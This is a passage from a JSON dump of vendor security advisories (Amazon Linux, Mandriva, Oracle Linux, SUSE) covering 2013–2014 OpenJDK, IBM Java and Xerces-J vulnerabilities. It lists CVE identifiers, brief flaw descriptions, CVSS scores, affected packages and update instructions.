__](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. ([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. ([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n \n \n", "modified": "2014-09-16T21:54:00", "published": "2014-09-16T21:54:00", "id": "ALAS-2013-246", "href": "https://alas.aws.amazon.com/ALAS-2013-246.html", "title": "Important: java-1.6.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:22:46", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>), [CVE-2013-5838 __](<https://access.redhat.com/security/cve/CVE-2013-5838>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. ([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 __](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5851 __](<https://access.redhat.com/security/cve/CVE-2013-5851>), [CVE-2013-5800 __](<https://access.redhat.com/security/cve/CVE-2013-5800>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. ([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. ([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.2.32.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n \n \n", "modified": "2014-09-16T21:45:00", "published": "2014-09-16T21:45:00", "id": "ALAS-2013-235", "href": "https://alas.aws.amazon.com/ALAS-2013-235.html", "title": "Critical: java-1.7.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "description": "resources exhaustion on XML parsing.", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14011", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14011", "title": "xerces-j DoS", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:193\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : xerces-j2\r\n Date : October 1, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A resource consumption issue was found in the way Xerces-J handled\r\n XML declarations. A remote attacker could use an XML document with\r\n a specially crafted declaration using a long pseudo-attribute name\r\n that, when parsed by an application using Xerces-J, would cause that\r\n application to use an excessive amount of CPU (CVE-2013-4002).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002\r\n https://rhn.redhat.com/errata/RHSA-2014-1319.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 52bdd3a413234b883bc99ac480d00ce4 mbs1/x86_64/xerces-j2-2.11.0-7.1.mbs1.noarch.rpm\r\n de543be77e3afa9c7cbedbc3d50881ff mbs1/x86_64/xerces-j2-demo-2.11.0-7.1.mbs1.noarch.rpm\r\n d44aa2df7aa370ef800bfe8699bce684 mbs1/x86_64/xerces-j2-javadoc-2.11.0-7.1.mbs1.noarch.rpm \r\n 4d9941ee6465984e781c4b668b90e438 mbs1/SRPMS/xerces-j2-2.11.0-7.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUK/h1mqjQ0CJFipgRAlppAKDaHlxOs5j+pd0FCV38TgV2FI9c0ACgnkYR\r\n/5rZeKz0+6ZhwoqEFnrGSdM=\r\n=MTih\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31186", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31186", "title": "[ MDVSA-2014:193 ] xerces-j2", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "unix", "description": "[2.11.0-17]\n- Fix XML parsing bug (JAXP, 8017298)\n- Resolves: CVE-2013-4002", "modified": "2014-09-29T00:00:00", "published": "2014-09-29T00:00:00", "id": "ELSA-2014-1319", "href": "http://linux.oracle.com/errata/ELSA-2014-1319.html", "title": "xerces-j2 security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:35", "bulletinFamily": "unix", "description": "[1:1.6.0.0-1.68.1.11.14]\n- updated to icedtea6-1.11.14.tar.gz\n- added and applied 1.11.14-fixes.patch, patch10 to fix build issues\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.67.1.13.0]\n- reverted previous update\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.66.1.13.0]\n- updated to icedtea 1.13\n- updated to openjdk-6-src-b28-04_oct_2013\n- added --disable-lcms2 configure switch to fix tck\n- removed upstreamed patch7,java-1.6.0-openjdk-jstack.patch\n- added patch7 1.13_fixes.patch to fix 1.13 build issues\n- adapted patch0 java-1.6.0-openjdk-optflags.patch\n- adapted patch3 java-1.6.0-openjdk-java-access-bridge-security.patch\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- removed useless runtests parts\n- included also java.security.old files\n- Resolves: rhbz#1017618", "modified": "2013-11-05T00:00:00", "published": "2013-11-05T00:00:00", "id": "ELSA-2013-1505", "href": "http://linux.oracle.com/errata/ELSA-2013-1505.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "unix", "description": "[1.7.0.45-2.4.3.1.0.1.el5_10]\n- Add oracle-enterprise.patch\n- Fix DISTRO_NAME to 'Enterprise Linux'\n[1.7.0.45-2.4.3.1.el5]\n- Updated to icedtea 2.4.3\n- Resolves: rhbz#1017623\n[1.7.0.45-2.4.3.0.el5]\n- fixed and updated tapset\n- removed bootstrap\n- source 11 redeclared to 1111\n- added source12: TestCryptoLevel.java\n- removed upstreamed patch103 java-1.7.0-openjdk-arm-fixes.patch\n- removed unnecessary patch112 java-1.7.0-openjdk-doNotUseDisabledEcc.patch\n- added patch120: java-1.7.0-openjdk-freetype-check-fix.patch\n- fixed nss\n- cleaned sources\n- Resolves: rhbz#1017623\n[1.7.0.25-2.4.1.4.el5]\n- updated to icedtea 2.4.1\n- improoved handling of patch111 - nss-config-2.patch\n- backported uniquesuffix from 6.5\n- Resolves: rhbz#978421", "modified": "2013-10-21T00:00:00", "published": "2013-10-21T00:00:00", "id": "ELSA-2013-1447", "href": "http://linux.oracle.com/errata/ELSA-2013-1447.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:18:18", "bulletinFamily": "unix", "description": "IBM Java 5 SR16-FP4 has been released which fixes lots of\n bugs and security issues.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n The following CVEs are fixed:\n CVE-2013-4041,CVE-2013-5375,CVE-2013-5372,CVE-2013-5843,CVE-\n 2013-5830,CVE-2013-5829,CVE-2013-5842,CVE-2013-5782,CVE-2013\n -5817,CVE-2013-5809,CVE-2013-5814,CVE-2013-5802,CVE-2013-580\n 4,CVE-2013-5783,CVE-2013-3829,CVE-2013-4002,CVE-2013-5774,CV\n E-2013-5825,CVE-2013-5840,CVE-2013-5801,CVE-2013-5778,CVE-20\n 13-5849,CVE-2013-5790,CVE-2013-5780,CVE-2013-5797,CVE-2013-5\n 803\n\n\n", "modified": "2013-11-14T16:04:15", "published": "2013-11-14T16:04:15", "id": "SUSE-SU-2013:1669-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00012.html", "title": "Security update for IBM Java 5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:14:44", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464, CVE-2013-2463,\n CVE-2013-2473, CVE-2013-2472, CVE-2013-2471, CVE-2013-2470,\n CVE-2013-2459, CVE-2013-3743, CVE-2013-2448, CVE-2013-2454,\n CVE-2013-2456 CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447 CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n\n\n", "modified": "2013-08-02T23:04:12", "published": "2013-08-02T23:04:12", "id": "SUSE-SU-2013:1293-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html", "type": "suse", "title": "Security update for IBMJava5 JRE and IBMJava5 SDK (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:37", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 has been updated to SR16-FP3 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bug has been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-27T17:04:14", "published": "2013-07-27T17:04:14", "id": "SUSE-SU-2013:1263-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html", "type": "suse", "title": "Security update for java-1_5_0-ibm (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:27:55", "bulletinFamily": "unix", "description": "IBM Java 1.5.0 was updated to SR16-FP3 to fix bugs and\n security issues:\n\n CVE-2013-3009, CVE-2013-3011, CVE-2013-3012, CVE-2013-4002,\n CVE-2013-2469, CVE-2013-2465, CVE-2013-2464,\n CVE-2013-2463, CVE-2013-2473, CVE-2013-2472,\n CVE-2013-2471, CVE-2013-2470, CVE-2013-2459, CVE-2013-3743,\n CVE-2013-2448, CVE-2013-2454, CVE-2013-2456,\n CVE-2013-2457, CVE-2013-2455, CVE-2013-2443,\n CVE-2013-2447, CVE-2013-2444, CVE-2013-2452, CVE-2013-2446,\n CVE-2013-2450, CVE-2013-1571, CVE-2013-1500\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n\n Additionally, the following bugs have been fixed: - Add\n Europe/Busingen to tzmappings (bnc#817062) - Mark files in\n jre/bin and bin/ as executable (bnc#823034).\n\n Security Issues:\n\n * CVE-2013-3009\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3009</a>\n >\n * CVE-2013-3011\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3011</a>\n >\n * CVE-2013-3012\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3012</a>\n >\n * CVE-2013-2469\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469</a>\n >\n * CVE-2013-4002\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002</a>\n >\n * CVE-2013-2465\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465</a>\n >\n * CVE-2013-2464\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2464</a>\n >\n * CVE-2013-2463\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463</a>\n >\n * CVE-2013-2473\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473</a>\n >\n * CVE-2013-2472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472</a>\n >\n * CVE-2013-2471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471</a>\n >\n * CVE-2013-2470\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470</a>\n >\n * CVE-2013-2459\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459</a>\n >\n * CVE-2013-3743\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3743\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3743</a>\n >\n * CVE-2013-2448\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448</a>\n >\n * CVE-2013-2454\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454</a>\n >\n * CVE-2013-2457\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457</a>\n >\n * CVE-2013-2456\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456</a>\n >\n * CVE-2013-2455\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455</a>\n >\n * CVE-2013-2443\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443</a>\n >\n * CVE-2013-2444\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444</a>\n >\n * CVE-2013-2447\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447</a>\n >\n * CVE-2013-2452\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452</a>\n >\n * CVE-2013-2446\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446</a>\n >\n * CVE-2013-2450\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450</a>\n >\n * CVE-2013-1571\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571</a>\n >\n * CVE-2013-1500\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500</a>\n >\n\n\n", "modified": "2013-07-30T17:04:11", "published": "2013-07-30T17:04:11", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00032.html", "id": "SUSE-SU-2013:1263-2", "title": "Security update for java-1_5_0-ibm (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n", "modified": "2013-07-27T17:04:18", "published": "2013-07-27T17:04:18", "id": "SUSE-SU-2013:1255-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00030.html", "title": "Security update for java-1_6_0-ibm (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:50", "bulletinFamily": "unix", "description": "IBM Java 1.6.0 has been updated to SR14 to fix bugs and\n security issues.\n\n Please see also\n <a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>\n <<a rel=\"nofollow\" href=\"http://www.ibm.com/developerworks/java/jdk/alerts/\">http://www.ibm.com/developerworks/java/jdk/alerts/</a>>\n\n Also the following bugs have been fixed:\n\n * add Europe/Busingen to tzmappings (bnc#817062)\n * mark files in jre/bin and bin/ as executable\n (bnc#823034)\n * check if installed qa_filelist is not empty\n (bnc#831936)\n", "modified": "2013-08-06T23:04:12", "published": "2013-08-06T23:04:12", "id": "SUSE-SU-2013:1305-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html", "title": "Security update for IBM Java 1.6.0 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:59:55", "bulletinFamily": "unix", "description": "IBM 